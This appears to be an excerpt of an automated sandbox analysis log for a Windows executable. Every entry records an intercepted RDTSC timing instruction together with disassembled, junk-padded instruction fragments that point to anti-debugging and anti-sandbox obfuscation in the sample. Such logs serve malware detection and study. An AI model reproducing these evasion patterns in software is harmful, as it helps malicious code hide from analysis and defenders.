Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: E0B51C second address: E0B521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D1EAE4 second address: D1EAF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F4760DF9846h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D03CA second address: 52D0423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F4760DF1542h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edx, si 0x00000019 pushfd 0x0000001a jmp 00007F4760DF1542h 0x0000001f or esi, 3D832AE8h 0x00000025 jmp 00007F4760DF153Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D0423 second address: 52D043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF9854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D043B second address: 52D0472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edx, cx 0x00000014 pushfd 0x00000015 jmp 00007F4760DF153Ch 0x0000001a adc ah, FFFFFFA8h 0x0000001d jmp 00007F4760DF153Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D0472 second address: 52D0477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D0477 second address: 52D0497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4760DF1543h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D0497 second address: 52D04BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D04BD second address: 52D04C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52D04FA second address: 52D0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 53005F5 second address: 53005FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 53005FB second address: 53005FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 53005FF second address: 5300679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d jmp 00007F4760DF153Ch 0x00000012 push ecx 0x00000013 pop eax 0x00000014 popad 0x00000015 push ebp 0x00000016 jmp 00007F4760DF1548h 0x0000001b mov dword ptr [esp], esi 0x0000001e jmp 00007F4760DF1540h 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 jmp 00007F4760DF1540h 0x0000002b nop 0x0000002c pushad 0x0000002d mov di, ax 0x00000030 jmp 00007F4760DF153Ah 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300679 second address: 530067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 530067D second address: 5300683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300683 second address: 5300689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300689 second address: 53006BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, 9C5Eh 0x0000000e movsx ebx, si 0x00000011 popad 0x00000012 push dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4760DF1548h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 53006BA second address: 53006C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 530076B second address: 52F003F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 cmp eax, 00000000h 0x00000013 setne al 0x00000016 xor ebx, ebx 0x00000018 test al, 01h 0x0000001a jne 00007F4760DF1537h 0x0000001c mov dword ptr [esp], 0000000Dh 0x00000023 call 00007F476559E78Fh 0x00000028 mov edi, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push edi 0x0000002e pop ecx 0x0000002f pushfd 0x00000030 jmp 00007F4760DF1547h 0x00000035 or si, 938Eh 0x0000003a jmp 00007F4760DF1549h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F003F second address: 52F0061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 jmp 00007F4760DF9853h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0061 second address: 52F0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0065 second address: 52F006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F006B second address: 52F0071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0071 second address: 52F0075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0075 second address: 52F00A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov al, dl 0x0000000f push esi 0x00000010 mov edi, 189F3CDCh 0x00000015 pop edi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00A2 second address: 52F00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00A6 second address: 52F00AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00AA second address: 52F00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00B0 second address: 52F00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF153Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00BF second address: 52F00C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00C3 second address: 52F00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F00D5 second address: 52F010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4760DF9855h 0x00000008 call 00007F4760DF9850h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 sub esp, 2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F010A second address: 52F010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F010E second address: 52F0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0114 second address: 52F01BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e jmp 00007F4760DF1549h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F4760DF1547h 0x0000001c and esi, 78DFE73Eh 0x00000022 jmp 00007F4760DF1549h 0x00000027 popfd 0x00000028 mov ch, 8Ah 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F4760DF1543h 0x00000031 xchg eax, edi 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 pop edx 0x00000036 push eax 0x00000037 pop edi 0x00000038 popad 0x00000039 mov bx, ax 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F4760DF1542h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F01BE second address: 52F01C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0204 second address: 52F0229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7D2DB67Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, 00000000h 0x00000012 pushad 0x00000013 mov ecx, 3F95D659h 0x00000018 mov cx, 7F15h 0x0000001c popad 0x0000001d sub edi, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0229 second address: 52F022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F022D second address: 52F0247 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0247 second address: 52F024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F024D second address: 52F0251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0251 second address: 52F0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0260 second address: 52F0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0264 second address: 52F0276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0276 second address: 52F02A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ah, dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 mov si, A3FDh 0x00000015 popad 0x00000016 je 00007F4760DF1710h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4760DF153Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F02A3 second address: 52F02D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4760DF984Fh 0x00000009 add si, 479Eh 0x0000000e jmp 00007F4760DF9859h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F031C second address: 52F0364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx ebx, ax 0x0000000d popad 0x0000000e nop 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4760DF1549h 0x00000016 and si, 91F6h 0x0000001b jmp 00007F4760DF1541h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov eax, 356C393Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F039F second address: 52F03A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F03A5 second address: 52F03FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007F4760DF1548h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 pushad 0x00000011 mov esi, ebx 0x00000013 call 00007F4760DF1543h 0x00000018 mov edx, esi 0x0000001a pop eax 0x0000001b popad 0x0000001c jg 00007F47D171F5E0h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F4760DF153Ch 0x0000002a mov dh, al 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F03FA second address: 52F04BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F4760DF98A2h 0x0000000f jmp 00007F4760DF9850h 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007F4760DF9850h 0x0000001c jne 00007F47D17278AEh 0x00000022 pushad 0x00000023 call 00007F4760DF984Eh 0x00000028 jmp 00007F4760DF9852h 0x0000002d pop eax 0x0000002e push edx 0x0000002f jmp 00007F4760DF984Eh 0x00000034 pop esi 0x00000035 popad 0x00000036 mov ebx, dword ptr [ebp+08h] 0x00000039 pushad 0x0000003a mov ax, bx 0x0000003d movsx ebx, cx 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-2Ch] 0x00000044 pushad 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F4760DF984Eh 0x0000004c add ecx, 2EE05AE8h 0x00000052 jmp 00007F4760DF984Bh 0x00000057 popfd 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b mov al, 79h 0x0000005d popad 0x0000005e push ebx 0x0000005f jmp 00007F4760DF984Eh 0x00000064 mov dword ptr [esp], esi 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a mov ecx, ebx 0x0000006c movsx edx, si 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F04BE second address: 52F0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, E553h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F4760DF1546h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, 8933h 0x00000018 call 00007F4760DF1548h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0501 second address: 52F0525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4760DF984Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0525 second address: 52F0529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0529 second address: 52F0573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushfd 0x00000008 jmp 00007F4760DF9857h 0x0000000d adc ecx, 12CE985Eh 0x00000013 jmp 00007F4760DF9859h 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ch, bh 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0573 second address: 52F0579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0579 second address: 52F057D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F057D second address: 52F05A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F05A5 second address: 52F05A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F05A9 second address: 52F05AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0A82 second address: 52F0B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4760DF9854h 0x00000011 xor ch, 00000018h 0x00000014 jmp 00007F4760DF984Bh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F4760DF9858h 0x00000020 and cx, 1778h 0x00000025 jmp 00007F4760DF984Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushad 0x00000030 jmp 00007F4760DF9852h 0x00000035 call 00007F4760DF9852h 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 52F0BEB second address: 52F0C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4760DF1546h 0x00000009 xor si, 5F48h 0x0000000e jmp 00007F4760DF153Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F4760DF1548h 0x0000001a xor al, FFFFFFA8h 0x0000001d jmp 00007F4760DF153Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push 4477A6D1h 0x0000002b jmp 00007F4760DF153Fh 0x00000030 xor dword ptr [esp], 31B13AF9h 0x00000037 jmp 00007F4760DF1546h 0x0000003c call 00007F47D1716436h 0x00000041 push 75C12B70h 0x00000046 push dword ptr fs:[00000000h] 0x0000004d mov eax, dword ptr [esp+10h] 0x00000051 mov dword ptr [esp+10h], ebp 0x00000055 lea ebp, dword ptr [esp+10h] 0x00000059 sub esp, eax 0x0000005b push ebx 0x0000005c push esi 0x0000005d push edi 0x0000005e mov eax, dword ptr [75C74538h] 0x00000063 xor dword ptr [ebp-04h], eax 0x00000066 xor eax, ebp 0x00000068 push eax 0x00000069 mov dword ptr [ebp-18h], esp 0x0000006c push dword ptr [ebp-08h] 0x0000006f mov eax, dword ptr [ebp-04h] 0x00000072 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000079 mov dword ptr [ebp-08h], eax 0x0000007c lea eax, dword ptr [ebp-10h] 0x0000007f mov dword ptr fs:[00000000h], eax 0x00000085 ret 0x00000086 jmp 00007F4760DF1540h 0x0000008b sub esi, esi 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 mov ax, 08B9h 0x00000094 mov cx, 7775h 0x00000098 popad 0x00000099 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300795 second address: 53007BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4760DF984Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 53007BA second address: 5300821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF1541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 jmp 00007F4760DF1540h 0x00000019 push esi 0x0000001a pushfd 0x0000001b jmp 00007F4760DF1541h 0x00000020 jmp 00007F4760DF153Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4760DF1542h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300821 second address: 530087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, DDh 0x00000005 mov ecx, 69FC8EA9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007F4760DF9854h 0x00000013 push eax 0x00000014 jmp 00007F4760DF984Bh 0x00000019 xchg eax, esi 0x0000001a jmp 00007F4760DF9856h 0x0000001f mov esi, dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F4760DF984Dh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 530087A second address: 5300906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F4760DF153Eh 0x00000010 je 00007F47D16FF052h 0x00000016 pushad 0x00000017 mov cl, 85h 0x00000019 movsx ebx, ax 0x0000001c popad 0x0000001d cmp dword ptr [75C7459Ch], 05h 0x00000024 jmp 00007F4760DF1542h 0x00000029 je 00007F47D171710Ch 0x0000002f pushad 0x00000030 mov edi, ecx 0x00000032 pushfd 0x00000033 jmp 00007F4760DF153Ah 0x00000038 add eax, 70624BF8h 0x0000003e jmp 00007F4760DF153Bh 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 jmp 00007F4760DF1546h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: 5300906 second address: 5300922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9858h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
